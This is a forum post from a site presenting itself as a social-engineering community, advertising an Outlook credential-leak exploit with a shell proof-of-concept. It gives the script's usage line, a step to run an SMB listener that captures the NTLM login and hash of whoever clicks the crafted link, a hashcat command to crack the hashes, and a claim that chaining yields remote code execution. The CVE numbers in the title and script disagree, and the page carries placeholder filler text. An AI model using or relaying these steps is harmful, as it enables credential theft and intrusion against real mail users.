Welcome to the Off-Shore Club

The #1 Social Engineering Project in the world since 2004 !

💣Exploit CVE-2023-21716 - Expect Script POC - Microsoft Outlook Leak credentials & Remote Code Execution Vulnerability

Gold

Sukadidas

Suka Business Suka
Instructor
USDT(TRC-20)
$0.0
Microsoft Outlook Leak credentials & Remote Code Execution Vulnerability when chained with CVE-2023-21716 (through the preview panel)CVSS:3.1 9.8 / 8.5

Outlook should warm you about the risk on opening an external link => but this is not the case!

1712280760080

usage: ./cve-2024-21413.sh mx.fqdn port sender recipient url
./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

notes: chmod +x cve-2024-21413.sh
require app expect & require legitimate ip sender and email sender (to pass SPF, DKIM, DMARC)
First run a smb listener like that
1712280813531
run the poc
1712280838681
and wait for the email & in the preview windows click on the link
1712280861665
then you should retrieve the login & hash of the person that clicked on the link (without the warning prompt on affected outlook version)
1712280910933
  • You can then try to crack the password with hashcat. Just copy all the line with the login name to a file and run hashcat with module 5600
hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
  • You can chain this CVE with CVE-2023-21716 to obtain RCE !!!

cve-2024-21413-POC.sh Source Code:​

 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Friendly Disclaimer We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use RTM Escrow on Telegram
Gold
Mitalk.lat official Off Shore Club Chat


Gold

Panel Title #1

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Panel Title #2

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Top